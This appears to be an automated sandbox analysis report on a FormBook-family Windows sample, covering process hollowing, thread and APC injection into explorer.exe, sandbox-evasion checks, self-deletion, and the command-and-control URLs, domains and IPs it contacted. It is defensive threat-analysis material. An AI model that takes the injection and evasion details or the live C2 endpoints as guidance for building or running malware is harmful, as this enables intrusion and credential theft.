          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\cryptedprof.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\cryptedprof.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\cryptedprof.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 180000Jump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403486

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerProcess Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 356722 Sample: cryptedprof.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 5 other signatures 2->44 10 cryptedprof.exe 19 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\System.dll, PE32 10->28 dropped 30 C:\Users\user\AppData\Local\Temp\8chdn.dll, PE32 10->30 dropped 54 Detected unpacking (changes PE section rights) 10->54 56 Maps a DLL or memory area into another process 10->56 58 Tries to detect virtualization through RDTSC time measurements 10->58 14 cryptedprof.exe 10->14         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 32 tabandolano.online 111.221.46.49, 49753, 80 READYSERVER-SGREADYSERVERPTELTDSG Singapore 17->32 34 thatlocaljawn.com 34.102.136.180, 49746, 80 GOOGLEUS United States 17->34 36 3 other IPs or domains 17->36 46 System process connects to network (likely due to code injection or exploit) 17->46 21 msdt.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          cryptedprof.exe27%ReversingLabsWin32.Trojan.Generic
          cryptedprof.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.cryptedprof.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.cryptedprof.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          3.0.cryptedprof.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.2.msdt.exe.4b9f834.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.1.cryptedprof.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.msdt.exe.4e4cf8.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.cryptedprof.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.cryptedprof.exe.2a60000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.tabandolano.online/rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.warungsuntik.com/rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk0%Avira URL Cloudsafe
          www.warungsuntik.com/rcv/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          tabandolano.online
          		111.221.46.49
          		truetrue
            		unknown
            thatlocaljawn.com
            		34.102.136.180
            		truetrue
              		unknown
              www.warungsuntik.com
              		168.206.81.138
              		truetrue
                		unknown
                www.thatlocaljawn.com
                		unknown
                		unknowntrue
                  		unknown
                  www.tabandolano.online
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.tabandolano.online/rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHktrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.warungsuntik.com/rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHktrue
                    • Avira URL Cloud: safe
                    		unknown
                    www.warungsuntik.com/rcv/true
                    • Avira URL Cloud: safe
                    		low

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.tiro.comexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorErrorcryptedprof.exefalse
                                    		high
                                    http://www.goodfont.co.krexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvmsdt.exe, 00000007.00000002.594068714.000000000508F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://nsis.sf.net/NSIS_Errorcryptedprof.exefalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fonts.comexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sakkal.comexplorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              34.102.136.180
                                              		unknownUnited States
                                              		15169GOOGLEUStrue
                                              111.221.46.49
                                              		unknownSingapore
                                              		63930READYSERVER-SGREADYSERVERPTELTDSGtrue
                                              168.206.81.138
                                              		unknownSouth Africa
                                              		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:356722
                                              Start date:23.02.2021
                                              Start time:15:29:59
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 23s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:cryptedprof.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:25
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/4@3/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 27.7% (good quality ratio 25.6%)
                                              • Quality average: 77%
                                              • Quality standard deviation: 29.9%
                                              HCA Information:
                                              • Successful, ratio: 80%
                                              • Number of executed functions: 100
                                              • Number of non-executed functions: 56
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 52.255.188.83, 168.61.161.212, 13.64.90.137, 51.104.139.180, 93.184.221.240, 51.103.5.186, 52.155.217.156, 92.122.213.194, 92.122.213.247, 20.54.26.129, 184.30.20.56
                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                              Simulations

                                              Behavior and APIs

                                              No simulations

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              34.102.136.180MT OCEAN STAR ISO 8217 2005.xlsxGet hashmaliciousBrowse
                                              • www.hattonpalacejewellery.com/67d/?cDK=W2Z2UcqSFcwA3YJY0Xi1zX0akAe1ObC272eZaT9vn/sHgfwkHiKnNOLEeBBq/HqgrL2ZGA==&PBR=dpddZ
                                              0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                              • www.fertinvitro.doctor/uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX
                                              Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                              • www.sweetpopntreatz.com/blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L
                                              lpdKSOB78u.exeGet hashmaliciousBrowse
                                              • www.havemercyinc.net/4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha
                                              vBugmobiJh.exeGet hashmaliciousBrowse
                                              • www.activagebenefits.net/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI
                                              ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                              • www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src
                                              NewOrder.xlsmGet hashmaliciousBrowse
                                              • www.covidwatcharizona.com/tub0/?azuxWju=dEK3j7mWBeQXl2zlSZSqDcFEW4EdlZEYoS0+mEVRU2HuA7A7T/ky1yECx94kGVXSwos3qg==&0dt=YtdhwPcHS
                                              Order_20180218001.exeGet hashmaliciousBrowse
                                              • www.houstoncouplesexpert.com/seon/?EJBpf8l=ojsb3jKq/XKh64QU9jx/ITCiT4+67gOjnvEpe+kxWJrzMHvdGcv1c3rSoEz5gk4FhTBQ&kDKHiZ=QFNTw2k
                                              22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                              • www.rizrvd.com/bw82/?RFQx_=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&GZopM=kvuD_XrpiP
                                              ORDER LIST.xlsxGet hashmaliciousBrowse
                                              • www.speedysnacksbox.com/4qdc/?jpaha=oetlJbtkpt9RC07gzGtc819EDOSw/wKhNDKeGQ7agYbSWM8ZAAA074MmVo5ceZhU2bos5Q==&3fz=fxopBn3xezt4N4a0
                                              PO_210222.exeGet hashmaliciousBrowse
                                              • www.kspindustries.com/dka/?9rYD4D2P=9WUKE20VMOTsgTPOGG+gM7wMKgTDQQYKjBu36Jx5uNlLi85Jvnz4VQqFTS3DYsDMhKcM&4h=vTxdADNprBU8ur
                                              Order83930.exeGet hashmaliciousBrowse
                                              • www.worksmade.com/pkfa/?kRm0q=AeLHm4krJ5cZleWXJ7DbkRDB3iMf+mbqkQIEvPdjRXBov8eOMTfw1ykaYqt0P2yYW1wd&P0D=AdpLplk
                                              DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                                              • www.lovethybodi.com/dll/?Ezrt7H=XrITfbQx&rJET96=VZxax5Ji0ayI+hrvRc8xbN6ADZocsLe3YiHwLknRP/O6fJJXAg3ZXgaLGnTQhcDUXCIi
                                              AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                              • www.sioosi.com/idir/?jFNhC=BAdMNhCaU+7u9XJaCO3iV4C5aA0TCLj07dpBj0L8TrCXQaq7x7/wZRF1tJRJ0mfI3EQomiZFcg==&PlHT0=_6g89p5H3xehg
                                              rad875FE.tmp.exeGet hashmaliciousBrowse
                                              • fdmail85.club/serverstat315/
                                              SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                              • www.buyers-connection.com/mt6e/?T8e0dp=hLmMffsGgwjrW5RZdYCH6mddSm2W9hJJfHEwGoyKmHJo5/xZlUyZeqeg++L426DpjyYm&Fx=3fdx_dt
                                              DHL Document. PDF.exeGet hashmaliciousBrowse
                                              • www.thebrowbandit.info/d8ak/?Szr0s4=zH7+TMUEa66ds4LUG5QkV+A8HFZNfwJlYCtch+3uZ/cbqgmlMO3qxYa4o/rgt+cFNwefcp2wvw==&QL3=uTyTqJdh5XE07
                                              eInvoice.exeGet hashmaliciousBrowse
